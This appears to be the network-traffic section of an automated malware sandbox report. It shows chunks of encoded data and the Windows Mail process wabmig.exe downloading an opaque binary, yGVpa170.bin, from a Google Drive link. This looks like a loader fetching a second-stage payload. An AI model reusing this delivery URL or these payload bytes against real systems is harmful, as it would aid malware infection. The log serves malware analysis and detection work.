            2024-09-16 12:45:14 UTC4850INData Raw: 36 77 49 63 63 48 45 42 6d 37 75 31 43 42 67 41 63 51 47 62 63 51 47 62 41 31 77 6b 42 4f 73 43 35 4e 64 78 41 5a 75 35 6a 4d 69 74 54 33 45 42 6d 33 45 42 6d 34 48 78 2b 58 31 4d 6f 4f 73 43 71 35 52 78 41 5a 75 42 38 58 57 31 34 65 39 78 41 5a 76 72 41 6b 45 72 36 77 4c 73 58 4f 73 43 46 76 47 36 50 6f 37 4c 63 4f 73 43 66 35 70 78 41 5a 74 78 41 5a 76 72 41 71 6a 52 4d 63 72 72 41 75 36 53 36 77 49 2b 75 6f 6b 55 43 2b 73 43 64 66 64 78 41 5a 76 52 34 75 73 43 77 4c 5a 78 41 5a 75 44 77 51 54 72 41 76 64 39 36 77 49 68 42 6f 48 35 43 35 71 59 41 6e 7a 4a 63 51 47 62 36 77 4c 55 35 59 74 45 4a 41 54 72 41 70 7a 37 63 51 47 62 69 63 4e 78 41 5a 76 72 41 6d 38 47 67 63 4f 77 78 6c 49 42 63 51 47 62 36 77 4b 46 61 4c 72 56 33 4d 71 70 63 51 47 62 63 51 47
            Data Ascii: 6wIccHEBm7u1CBgAcQGbcQGbA1wkBOsC5NdxAZu5jMitT3EBm3EBm4Hx+X1MoOsCq5RxAZuB8XW14e9xAZvrAkEr6wLsXOsCFvG6Po7LcOsCf5pxAZtxAZvrAqjRMcrrAu6S6wI+uokUC+sCdfdxAZvR4usCwLZxAZuDwQTrAvd96wIhBoH5C5qYAnzJcQGb6wLU5YtEJATrApz7cQGbicNxAZvrAm8GgcOwxlIBcQGb6wKFaLrV3MqpcQGbcQG
            2024-09-16 12:45:14 UTC4850INData Raw: 55 37 75 38 49 6c 4f 37 76 43 4a 54 73 61 69 34 6d 63 41 7a 67 49 64 78 35 54 78 68 68 7a 30 34 34 30 6a 69 33 39 4f 37 76 43 4a 54 75 37 77 69 55 37 75 38 49 6c 4f 37 76 43 4a 54 75 37 77 69 55 37 75 38 49 6c 4f 37 76 43 4a 5a 2f 42 57 37 67 46 57 55 4d 69 50 45 2b 71 50 42 44 69 65 30 32 74 54 36 42 6b 75 72 2f 6d 61 2b 2b 2b 4d 48 53 43 52 4f 44 48 31 7a 6f 7a 78 68 48 44 53 36 54 53 6d 35 4b 38 58 6a 4c 44 75 52 48 36 59 31 7a 38 66 32 30 37 75 78 49 39 4c 44 59 7a 68 63 43 4d 62 79 70 45 35 66 55 50 67 4b 6c 4c 63 51 61 76 42 70 39 32 37 4c 63 50 44 51 44 66 42 72 7a 79 6a 4a 32 45 71 72 4d 6c 41 57 49 36 37 67 46 2f 78 39 42 70 75 6f 2f 6d 6c 33 66 74 4a 55 32 58 52 4b 37 58 55 2f 76 51 53 6c 33 71 65 38 32 2f 73 68 2b 6b 79 74 59 4a 56 59 4d 36 4b
            Data Ascii: U7u8IlO7vCJTsai4mcAzgIdx5Txhhz0440ji39O7vCJTu7wiU7u8IlO7vCJTu7wiU7u8IlO7vCJZ/BW7gFWUMiPE+qPBDie02tT6Bkur/ma+++MHSCRODH1zozxhHDS6TSm5K8XjLDuRH6Y1z8f207uxI9LDYzhcCMbypE5fUPgKlLcQavBp927LcPDQDfBrzyjJ2EqrMlAWI67gF/x9Bpuo/ml3ftJU2XRK7XU/vQSl3qe82/sh+kytYJVYM6K
            2024-09-16 12:45:14 UTC148INData Raw: 62 74 52 39 58 55 77 44 62 79 33 67 51 78 45 66 6b 53 61 54 45 65 6c 34 62 38 4a 61 7a 61 54 4a 42 4d 63 2b 69 6a 6f 77 36 4d 6e 38 2b 61 54 52 46 65 43 5a 76 6a 4c 51 6a 4c 6b 78 48 4c 78 57 48 39 4b 79 45 58 65 35 62 71 47 47 51 75 35 6d 77 56 4a 43 6a 79 62 64 6a 76 52 5a 6e 55 4e 4f 42 58 79 36 7a 33 50 4b 53 67 6f 63 61 70 37 45 73 52 43 42 58 4f 46 44 45 52 38 37 77 6a 5a 36 4f 73 59 42 78 4e 64 66 2b 47 30 46 2b 5a 59 67 34 45 50 54
            Data Ascii: btR9XUwDby3gQxEfkSaTEel4b8JazaTJBMc+ijow6Mn8+aTRFeCZvjLQjLkxHLxWH9KyEXe5bqGGQu5mwVJCjybdjvRZnUNOBXy6z3PKSgocap7EsRCBXOFDER87wjZ6OsYBxNdf+G0F+ZYg4EPT
            2024-09-16 12:45:14 UTC1390INData Raw: 52 71 4d 32 32 62 70 4e 65 75 2f 55 48 45 73 72 64 45 64 44 68 77 30 41 56 59 55 34 56 59 77 74 4d 50 36 51 5a 62 56 59 75 2b 41 46 57 76 6c 4e 45 33 48 73 42 6f 70 71 61 4e 76 48 5a 70 78 44 4e 48 7a 79 4a 54 75 37 77 69 55 37 75 38 49 6c 4f 37 76 43 4a 54 75 37 77 69 55 37 75 38 49 6c 4f 37 76 43 4a 54 75 37 77 70 6a 65 38 38 47 51 70 65 68 52 50 65 55 62 30 2f 30 38 63 32 63 55 7a 67 61 56 6d 6f 6d 4c 78 4a 79 36 54 4a 41 34 51 37 5a 44 79 74 75 58 76 4a 46 74 4a 30 76 44 4f 6f 56 66 6f 4d 4c 4a 31 77 7a 47 37 6f 78 37 4c 66 6a 76 59 6b 67 6e 67 33 42 4c 5a 54 4d 2b 46 79 62 4d 4f 30 73 36 4b 4d 62 53 37 69 73 77 79 68 47 75 51 61 2f 6f 65 59 5a 38 45 4e 57 6d 77 49 66 4e 6f 53 56 42 78 69 56 67 35 55 66 30 5a 4f 76 4e 4a 4d 71 37 77 69 55 37 75 38 49
            Data Ascii: RqM22bpNeu/UHEsrdEdDhw0AVYU4VYwtMP6QZbVYu+AFWvlNE3HsBopqaNvHZpxDNHzyJTu7wiU7u8IlO7vCJTu7wiU7u8IlO7vCJTu7wpje88GQpehRPeUb0/08c2cUzgaVmomLxJy6TJA4Q7ZDytuXvJFtJ0vDOoVfoMLJ1wzG7ox7LfjvYkgng3BLZTM+FybMO0s6KMbS7iswyhGuQa/oeYZ8ENWmwIfNoSVBxiVg5Uf0ZOvNJMq7wiU7u8I
            2024-09-16 12:45:14 UTC1390INData Raw: 49 6c 4f 37 76 43 4a 54 75 37 77 69 55 37 75 38 49 6c 4f 37 76 43 4a 59 53 2b 64 46 68 56 31 69 79 34 6e 53 38 65 4e 39 4f 4a 44 6f 6e 41 4f 6a 54 58 56 2b 47 4f 64 34 46 4a 50 6d 76 39 4f 69 67 75 54 64 52 33 70 4e 46 63 52 2f 6f 72 36 31 36 73 32 37 72 53 75 4c 35 46 74 43 65 30 44 6d 7a 72 48 42 61 41 2f 6b 6d 45 69 55 61 47 5a 79 68 64 44 6b 5a 4c 6d 46 6c 37 41 33 56 39 48 68 66 32 71 56 35 6d 42 41 36 51 5a 36 39 55 66 63 72 4a 76 32 43 61 48 4f 76 68 6c 5a 70 6d 32 5a 38 6a 75 6c 52 30 63 55 52 6b 51 39 4a 31 59 47 53 63 75 6e 7a 56 44 37 7a 62 6b 4c 6d 79 57 63 4d 66 70 74 33 37 37 6b 53 79 48 45 6a 79 67 2f 50 33 47 37 30 77 56 78 5a 75 72 4d 46 59 73 44 43 49 32 56 6d 58 68 35 2b 56 50 4a 70 6f 70 45 6b 44 6d 77 42 38 73 61 71 53 36 71 71 43 53
            Data Ascii: IlO7vCJTu7wiU7u8IlO7vCJYS+dFhV1iy4nS8eN9OJDonAOjTXV+GOd4FJPmv9OiguTdR3pNFcR/or616s27rSuL5FtCe0DmzrHBaA/kmEiUaGZyhdDkZLmFl7A3V9Hhf2qV5mBA6QZ69UfcrJv2CaHOvhlZpm2Z8julR0cURkQ9J1YGScunzVD7zbkLmyWcMfpt377kSyHEjyg/P3G70wVxZurMFYsDCI2VmXh5+VPJpopEkDmwB8saqS6qqCS
            2024-09-16 12:45:15 UTC1390INData Raw: 75 38 49 6c 4f 37 76 43 4a 54 75 37 77 69 57 61 78 63 4a 55 76 69 78 52 30 70 73 4b 56 54 44 2f 61 51 37 4e 73 55 6e 47 4a 57 77 45 58 63 6e 68 6c 45 50 53 39 68 6f 53 79 72 70 4d 6c 4b 57 73 58 55 50 4b 74 62 4c 49 2f 72 70 55 74 4f 65 6f 38 4a 47 35 73 6c 6a 44 48 71 61 44 47 31 41 66 31 69 64 6b 57 72 50 66 79 7a 4d 37 33 37 57 6c 74 52 52 67 38 75 2b 31 79 78 48 32 47 6d 6e 78 5a 42 6f 30 4d 47 4c 62 67 4c 75 4c 4c 54 6a 78 58 75 6b 74 6c 35 73 30 35 67 54 67 52 2b 5a 6b 36 48 6c 49 46 30 54 41 70 50 6a 38 4f 32 38 4a 4f 6a 48 35 46 73 4e 38 70 50 67 6a 4f 75 68 50 36 56 36 73 32 62 4c 59 75 4c 39 67 74 7a 72 49 2f 4f 30 33 69 33 2f 52 2f 31 67 6f 77 32 4f 77 50 6f 69 37 51 51 6f 68 37 7a 36 36 4d 67 4f 36 50 67 6d 6e 6a 76 56 38 37 76 62 30 56 4a 65
            Data Ascii: u8IlO7vCJTu7wiWaxcJUvixR0psKVTD/aQ7NsUnGJWwEXcnhlEPS9hoSyrpMlKWsXUPKtbLI/rpUtOeo8JG5sljDHqaDG1Af1idkWrPfyzM737WltRRg8u+1yxH2GmnxZBo0MGLbgLuLLTjxXuktl5s05gTgR+Zk6HlIF0TApPj8O28JOjH5FsN8pPgjOuhP6V6s2bLYuL9gtzrI/O03i3/R/1gow2OwPoi7QQoh7z66MgO6PgmnjvV87vb0VJe
            2024-09-16 12:45:15 UTC1390INData Raw: 41 6e 4b 6c 4a 69 70 42 79 61 72 6e 61 6a 65 43 41 5a 78 70 54 70 48 51 52 44 57 58 36 48 6b 6a 56 49 67 57 76 35 62 35 59 4d 73 79 68 33 48 4a 54 31 73 64 6c 79 73 70 45 55 72 78 63 54 59 5a 6c 4b 58 4d 6c 6c 70 69 38 6d 4a 56 6b 57 4d 70 32 64 70 41 6a 77 53 46 4e 57 6e 7a 2b 37 53 36 41 48 75 73 49 6c 62 51 55 57 61 4f 48 6a 51 38 74 6e 33 58 30 4a 75 6b 32 4a 55 69 47 58 53 7a 76 57 75 48 31 57 67 41 2b 37 49 4b 56 31 67 50 34 66 46 34 74 66 4b 59 79 35 52 61 6c 61 77 53 2b 63 7a 34 6e 57 76 69 39 35 63 46 37 48 48 56 70 38 62 58 59 74 41 6c 30 6b 64 78 6c 46 50 6c 70 4e 6a 71 52 37 4e 48 7a 31 63 44 75 37 77 69 55 37 75 38 49 6c 4f 37 76 43 4a 54 75 37 77 69 55 37 75 38 49 6c 4f 37 76 43 4a 54 75 37 77 69 57 42 55 48 74 56 5a 78 31 37 59 2f 62 73 62
            Data Ascii: AnKlJipByarnajeCAZxpTpHQRDWX6HkjVIgWv5b5YMsyh3HJT1sdlyspEUrxcTYZlKXMllpi8mJVkWMp2dpAjwSFNWnz+7S6AHusIlbQUWaOHjQ8tn3X0Juk2JUiGXSzvWuH1WgA+7IKV1gP4fF4tfKYy5RalawS+cz4nWvi95cF7HHVp8bXYtAl0kdxlFPlpNjqR7NHz1cDu7wiU7u8IlO7vCJTu7wiU7u8IlO7vCJTu7wiWBUHtVZx17Y/bsb
            2024-09-16 12:45:15 UTC1390INData Raw: 56 6c 6b 7a 35 74 33 33 34 32 37 6b 58 72 42 33 67 61 4e 57 2b 32 6d 69 6a 67 51 30 54 55 39 59 42 71 49 30 75 74 51 2b 4f 37 76 43 4a 54 75 37 77 69 55 37 75 38 49 6c 4f 37 76 43 4a 54 75 37 77 69 55 37 75 38 49 6c 4f 37 76 43 4a 59 46 70 42 6c 66 34 74 62 50 37 73 49 2f 53 74 36 6e 56 45 55 30 4d 6f 76 41 42 61 67 4c 50 4b 67 65 64 51 2b 52 76 78 78 53 63 75 6c 49 7a 48 43 6c 62 53 78 54 55 7a 49 52 71 6b 42 4e 6f 4c 2f 53 37 41 49 38 50 49 57 58 31 58 5a 61 35 36 4e 55 2b 50 6f 77 54 55 41 41 6f 35 4c 56 71 53 31 57 64 51 37 31 69 4f 75 34 42 6c 51 51 47 6d 37 71 50 35 6e 64 72 39 39 2b 6b 50 35 2b 75 71 59 69 51 70 43 72 38 69 38 49 6c 4f 37 76 43 4a 54 75 37 77 69 55 37 75 38 49 6c 4f 37 76 43 4a 54 75 37 77 69 55 37 75 38 49 6c 4f 37 74 37 31 65 64
            Data Ascii: Vlkz5t33427kXrB3gaNW+2mijgQ0TU9YBqI0utQ+O7vCJTu7wiU7u8IlO7vCJTu7wiU7u8IlO7vCJYFpBlf4tbP7sI/St6nVEU0MovABagLPKgedQ+RvxxSculIzHClbSxTUzIRqkBNoL/S7AI8PIWX1XZa56NU+PowTUAAo5LVqS1WdQ71iOu4BlQQGm7qP5ndr99+kP5+uqYiQpCr8i8IlO7vCJTu7wiU7u8IlO7vCJTu7wiU7u8IlO7t71ed
            2024-09-16 12:45:15 UTC1390INData Raw: 6e 6e 75 30 42 2b 41 2b 6b 6f 6b 33 57 6a 52 32 41 77 54 36 45 37 75 38 49 71 4f 36 73 62 4a 54 75 37 77 69 55 37 75 38 49 6c 4f 37 76 43 4a 54 75 37 77 69 55 37 75 38 49 6c 4f 37 76 43 4a 54 75 37 77 6f 59 72 78 79 2f 58 68 76 72 64 73 35 47 32 75 4d 43 42 4e 79 57 62 5a 75 70 37 64 4a 38 77 43 61 54 4b 79 32 4f 55 35 7a 6f 7a 39 45 74 67 76 4b 54 4b 53 37 62 45 55 75 6c 65 72 4e 6d 36 79 4c 68 64 50 6a 70 52 43 71 59 36 48 74 4c 63 2b 4f 74 36 58 32 6b 5a 38 61 52 41 43 71 4f 53 50 5a 30 32 31 2b 4e 4d 38 7a 4a 2f 65 56 77 47 49 4a 34 6f 74 49 42 76 45 36 69 4b 63 46 7a 72 69 37 70 65 2f 65 67 56 7a 6f 42 41 59 51 4a 71 6d 4b 48 77 34 69 6f 71 69 62 2f 43 7a 4d 57 38 77 69 58 33 4d 42 79 51 4c 50 4f 63 4c 30 68 36 5a 4c 56 54 67 48 6f 76 75 64 31 68 32
            Data Ascii: nnu0B+A+kok3WjR2AwT6E7u8IqO6sbJTu7wiU7u8IlO7vCJTu7wiU7u8IlO7vCJTu7woYrxy/Xhvrds5G2uMCBNyWbZup7dJ8wCaTKy2OU5zoz9EtgvKTKS7bEUulerNm6yLhdPjpRCqY6HtLc+Ot6X2kZ8aRACqOSPZ021+NM8zJ/eVwGIJ4otIBvE6iKcFzri7pe/egVzoBAYQJqmKHw4ioqib/CzMW8wiX3MByQLPOcL0h6ZLVTgHovud1h2
            2024-09-16 12:45:15 UTC1390INData Raw: 79 73 4c 50 41 37 46 43 50 67 5a 54 79 33 71 76 65 44 75 35 78 42 7a 72 4d 46 65 51 4f 72 76 43 4b 72 5a 36 78 43 55 37 36 6e 74 79 50 63 75 53 70 4d 70 44 54 76 49 56 4f 6a 4d 42 70 52 36 78 70 50 70 6c 62 42 49 4e 4f 6a 4e 39 47 59 4b 42 72 41 4b 2b 75 56 72 56 37 6f 72 56 5a 58 32 68 55 4b 65 6d 31 71 47 43 4c 36 61 7a 68 39 59 78 58 6a 6d 57 34 72 53 5a 6d 64 4b 46 67 52 2b 4e 69 6b 39 50 36 6d 61 76 43 37 6b 56 52 75 4b 55 6d 30 52 7a 52 6e 36 36 56 5a 71 42 73 59 74 44 79 78 79 59 4f 41 39 6f 4a 30 76 47 4d 6f 68 66 51 37 35 4a 75 7a 50 66 51 67 53 4a 55 51 59 4b 6a 62 78 7a 58 35 53 56 50 63 36 6a 67 6d 6b 78 6e 73 75 79 42 30 64 31 43 56 68 6f 54 79 68 35 7a 4e 4f 4b 39 48 61 4d 6a 30 49 48 59 4a 6e 56 69 73 42 4c 6a 41 2b 6e 75 41 52 44 76 6e 69
            Data Ascii: ysLPA7FCPgZTy3qveDu5xBzrMFeQOrvCKrZ6xCU76ntyPcuSpMpDTvIVOjMBpR6xpPplbBINOjN9GYKBrAK+uVrV7orVZX2hUKem1qGCL6azh9YxXjmW4rSZmdKFgR+Nik9P6mavC7kVRuKUm0RzRn66VZqBsYtDyxyYOA9oJ0vGMohfQ75JuzPfQgSJUQYKjbxzX5SVPc6jgmkxnsuyB0d1CVhoTyh5zNOK9HaMj0IHYJnVisBLjA+nuARDvni


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.449739142.250.185.1104437172C:\Program Files (x86)\Windows Mail\wabmig.exe
            TimestampBytes transferredDirectionData
            2024-09-16 12:45:47 UTC216OUTGET /uc?export=download&id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.google.com
            Cache-Control: no-cache
            2024-09-16 12:45:47 UTC1610INHTTP/1.1 303 See Other
            Content-Type: application/binary
            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
            Pragma: no-cache
            Expires: Mon, 01 Jan 1990 00:00:00 GMT
            Date: Mon, 16 Sep 2024 12:45:47 GMT
            Location: https://drive.usercontent.google.com/download?id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV&export=download
            Strict-Transport-Security: max-age=31536000
            Cross-Origin-Opener-Policy: same-origin
            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
            Content-Security-Policy: script-src 'nonce-6aakWSraa3uCab8-GFJD0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            Server: ESF
            Content-Length: 0
            X-XSS-Protection: 0
            X-Frame-Options: SAMEORIGIN
            X-Content-Type-Options: nosniff
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.449740142.250.185.1934437172C:\Program Files (x86)\Windows Mail\wabmig.exe
            TimestampBytes transferredDirectionData
            2024-09-16 12:45:48 UTC258OUTGET /download?id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV&export=download HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Cache-Control: no-cache
            Host: drive.usercontent.google.com
            Connection: Keep-Alive
            2024-09-16 12:45:51 UTC4845INHTTP/1.1 200 OK
            Content-Type: application/octet-stream
            Content-Security-Policy: sandbox
            Content-Security-Policy: default-src 'none'
            Content-Security-Policy: frame-ancestors 'none'
            X-Content-Security-Policy: sandbox
            Cross-Origin-Opener-Policy: same-origin
            Cross-Origin-Embedder-Policy: require-corp
            Cross-Origin-Resource-Policy: same-site
            X-Content-Type-Options: nosniff
            Content-Disposition: attachment; filename="yGVpa170.bin"
            Access-Control-Allow-Origin: *
            Access-Control-Allow-Credentials: false
            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
            Accept-Ranges: bytes
            Content-Length: 287296
            Last-Modified: Sun, 15 Sep 2024 20:45:59 GMT
            X-GUploader-UploadID: AD-8ljv3soFYlXofWKXBjc_-gToAQEZI5I07Md2_3V7S2b7EVlU4MSg11azMu_5qPWbZNQ6FnOY
            Date: Mon, 16 Sep 2024 12:45:50 GMT
            Expires: Mon, 16 Sep 2024 12:45:50 GMT
            Cache-Control: private, max-age=0
            X-Goog-Hash: crc32c=lnh0Rg==
            Server: UploadServer
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close
            2024-09-16 12:45:51 UTC4845INData Raw: f1 1b d0 e0 05 d5 89 d8 6e 4b 24 ec 1e 2e 4a 7b 54 d1 07 4f 1c df c8 af 32 a4 ac 45 72 42 fd 01 8f b6 cf 20 dd 44 8a d1 5c 9a 3f 17 5b 18 f4 d9 3f f4 4e e9 90 63 b5 03 15 18 5f 90 d5 61 ae 7b 67 bb a7 47 18 e4 1c b8 c9 b4 0e ea 34 8d a4 85 ea 96 cc 4f 35 0c de 4c 41 b4 52 d4 d0 56 2a d2 81 21 b1 a5 57 5d 2a 6b 46 73 86 d1 2c 95 84 23 47 ba de ad 61 05 23 b0 d9 82 bc 3e f6 d5 2f fb 65 e3 31 87 ec 53 74 2e 3e 25 2f 24 81 ce c0 7b 58 98 cc a6 3f c4 7d 4b 25 e4 5c 96 fb a1 60 ea e4 7f 55 a4 29 c4 2a 2f 87 f1 a9 07 84 c9 3f 96 d5 94 df a6 6c 6e aa d1 fa 50 46 0b 60 3c c8 a6 be 2b 4e c4 ee aa d5 2f 27 e7 42 96 f2 3f 61 14 3a eb eb 46 4b 04 da b8 bc a0 8e e6 6f 73 ac d7 ce 60 6d 8e a0 09 4f 74 5b fe 39 1e 09 6b cc 86 3e 52 78 4a ae 36 ee e6 4a 2f 28 2d b8 12 02
            Data Ascii: nK$.J{TO2ErB D\?[?Nc_a{gG4O5LARV*!W]*kFs,#Ga#>/e1St.>%/${X?}K%\`U)*/?lnPF`<+N/'B?a:FKos`mOt[9k>RxJ6J/(-
            2024-09-16 12:45:51 UTC4845INData Raw: 8c 6e 1c e0 a4 50 0e db f5 21 fd 5c a2 b3 cf cd d3 7e 1d 1e 68 88 86 bc b1 43 97 9d 9f 86 fc 5a de 0d 86 64 b2 06 89 f6 a5 9a 7e 21 83 54 52 e9 d2 ad 00 32 d3 9c ec 65 9d 95 16 e9 3c 27 c8 0d 4d 2f 86 28 b6 ee a7 54 1d 1e 0d ff a5 d4 4c 8d d1 c6 2e 29 97 e7 05 48 1e e7 5e 84 5b 5a 3e a5 d9 a9 6d b1 21 79 d1 e0 45 6e 64 41 a2 6d 75 32 9a d5 d8 0f 91 e5 50 bd 44 d3 1a 4c ac 3d b6 e3 66 87 7f 7b 38 75 9d 94 de eb 19 70 06 f5 8d 0f 24 7e 64 b2 f4 ef bc 4e 0d 20 c6 86 50 22 31 63 7d 7b a0 ed 46 fe 79 08 6a fd bd 85 dd eb bb 26 6d b0 e1 b0 f9 45 5f 09 35 ce a1 c4 48 4d 38 5f 6a 6c 84 99 7b af 8a 1f 71 30 97 d2 34 b4 d0 c7 e3 6e 02 45 6d 8f 6a a6 4f 50 d0 fe e1 61 be 38 8e b9 1c cf d3 c4 f0 86 44 78 6b 40 25 5d 3b 51 82 e7 c9 61 46 67 5a c8 35 ce b2 d3 27 ff 5b
            Data Ascii: nP!\~hCZd~!TR2e<'M/(TL.)H^[Z>m!yEndAmu2PDL=f{8up$~dN P"1c}{Fyj&mE_5HM8_jl{q04nEmjOPa8Dxk@%];QaFgZ5'[
            2024-09-16 12:45:51 UTC160INData Raw: 33 ea 85 6b 11 af cd 61 aa 2a 1f 89 4b f1 2d 4e 9d 43 b6 39 e9 6c c5 41 24 a7 e5 d5 40 30 2e da c2 d7 53 74 9a 25 74 2e b5 5a 00 20 dc 32 04 ce ab 41 f0 6d 79 23 45 a4 36 cd f5 83 07 93 d1 d9 15 dc 42 21 a3 7b 87 94 32 b1 e6 68 9e 65 aa 85 47 78 69 89 e7 c4 76 38 62 7e 86 80 35 bd 22 e9 cb 88 14 88 b1 cd 88 e1 49 e9 39 52 61 2f 75 d5 8e f2 8e 35 7e 2c 8d a6 04 e4 01 b5 48 a1 e9 c6 82 13 b1 38 08 28 e9 2b 37 47 df 12 f0 d8 68 4f a4 39 0e 70 68 5c 84 25 75 75 31 4b 9b ab 11 8a
            Data Ascii: 3ka*K-NC9lA$@0.St%t.Z 2Amy#E6B!{2heGxiv8b~5"I9Ra/u5~,H8(+7GhO9ph\%uu1K
            2024-09-16 12:45:51 UTC1326INData Raw: 30 3b 69 5a e7 0f df c0 d9 f7 ad f5 be a9 e4 ad 70 0f 95 13 bd 81 53 9b 61 25 61 a8 c2 82 30 37 53 28 f1 78 64 4d 85 bd 11 f8 09 aa 95 d4 d8 34 70 40 ee 54 cf 32 89 33 b6 70 58 e2 a9 ab 9a 00 d6 61 94 4e 64 d3 69 25 1b 9d ef b6 7e 73 b5 4a 63 e2 d5 d4 34 c4 92 f0 f1 ea 5b 15 68 6a 75 b7 fe bc f9 40 4d d6 34 3f b8 1e 2c 3a 7a cb 36 26 29 10 6a 2c 8b a8 72 d1 12 e8 81 de 1e 92 19 18 c6 1f b8 c9 6f 49 06 b4 43 98 b9 74 d4 47 4f bb 69 79 8c 69 b7 5a 93 f2 51 31 b0 76 ce 70 5f 51 d6 d0 aa a9 6c 85 2b 59 78 0f 76 4f 05 4e d1 61 05 a6 62 d6 06 08 3e 4e d5 96 1f 30 fc 8b 37 65 e7 7d e3 a7 8c 2e 68 4c d2 1d 13 31 eb e3 9a 8b e2 6f cc cf fc 88 cc c4 d7 7a e7 15 a0 43 dc 84 12 7b 41 a7 98 c7 9f e9 0b e3 fa 4f 14 7a 39 44 e8 5d 1a 31 4f 45 f1 15 d1 43 f3 cf 69 c6 9f
            Data Ascii: 0;iZpSa%a07S(xdM4p@T23pXaNdi%~sJc4[hju@M4?,:z6&)j,roICtGOiyiZQ1vp_Ql+YxvONab>N07e}.hL1ozC{AOz9D]1OECi
            2024-09-16 12:45:51 UTC1390INData Raw: 8e af a4 6a 4c 72 38 47 82 b4 35 ff 4e c3 42 63 a7 f0 18 db 33 fb e3 fc cf a5 3f 92 20 02 b5 ac 45 36 db 7d 26 ee 0d 9e ee f8 23 8f ce a1 f1 ef f8 b3 67 e4 26 3e 91 98 9e 34 5e c2 d6 f6 c9 91 6a 0f 8d 82 b9 8b cb f4 22 20 c6 d3 82 4a af 36 ee e9 96 08 d7 d2 0b 98 7e a5 96 6e c6 1c e5 58 68 b9 cd 5c c9 25 f4 12 e8 83 7c 67 0e 7a e8 7a 20 38 5f 18 05 c6 dd 32 d4 d5 d6 58 16 75 a2 aa b2 c7 04 19 48 51 9a 5b d1 15 26 bd 0e 4d a5 17 ab ce 72 e2 bf 68 bf 9f 49 81 2e 9d 98 ea 1a 61 9f 53 0d 6f a7 37 ee 88 d8 bb ea b0 8f c3 06 da c9 98 aa 06 e0 b1 a7 d5 5e 82 56 20 07 ba d6 df d5 72 2c 27 07 f2 c0 78 ec a8 5c 34 19 9b 39 7e 74 12 37 c9 6c 0b 13 e6 39 bb ea 79 ec 58 e2 62 43 57 d4 b2 5d c6 56 a4 7f 86 e5 b6 a0 39 dc dc 40 fc 50 5b d0 a7 ee 89 18 fa f5 8a ce 00 00
            Data Ascii: jLr8G5NBc3? E6}&#g&>4^j" J6~nXh\%|gzz 8_2XuHQ[&MrhI.aSo7^V r,'x\49~t7l9yXbCW]V9@P[
            2024-09-16 12:45:51 UTC1390INData Raw: c1 e6 5d 18 86 de 1b e3 ae 1a 1a 58 56 ce c9 71 50 5d de 0a 07 55 6e a2 57 a4 7e db b7 c1 c0 25 1a b7 70 bb 82 50 b0 9c 8a 6a f3 bd 34 5e f4 b7 f1 53 46 62 2a 19 d9 b8 a7 54 1d 99 eb fc 51 56 8a dd 07 57 e9 9f eb d0 78 cc 6f 6c d1 0a 12 d6 15 e0 d5 a7 82 0b 9d 98 a8 66 57 60 e1 3c 27 9b 00 8e ad 65 33 e8 a8 4e 4c bd 31 b1 48 0d c7 23 bb 9e 22 81 36 87 b7 57 54 7f 51 48 56 78 0d c5 72 47 a7 e7 e8 6c 19 a8 73 cd ab 7c ec fa 3c c9 bb d4 4c a8 4d 9a 84 74 fe 51 b5 d6 6a 79 89 83 31 25 2d 41 d4 75 81 0a 3d dc ea 78 db ee 80 0b d7 dd c0 2d 12 f8 47 c9 8a 1c a1 2d bf 21 3b 0d 93 ad ef 61 d4 8f 33 2e a0 67 a2 1a b0 86 41 ac 6f a7 03 36 6e 0b d0 d3 d2 e8 8f 8f 36 83 87 65 fd 27 92 26 5c 2a 75 b3 ef 23 32 b5 1f a5 21 9f 87 a9 bb e4 63 e1 bf f8 d5 75 ec 06 f4 64 b3
            Data Ascii: ]XVqP]UnW~%pPj4^SFb*TQVWxolfW`<'e3NL1H#"6WTQHVxrGls|<LMtQjy1%-Au=x-G-!;a3.gAo6n6e'&\*u#2!cud
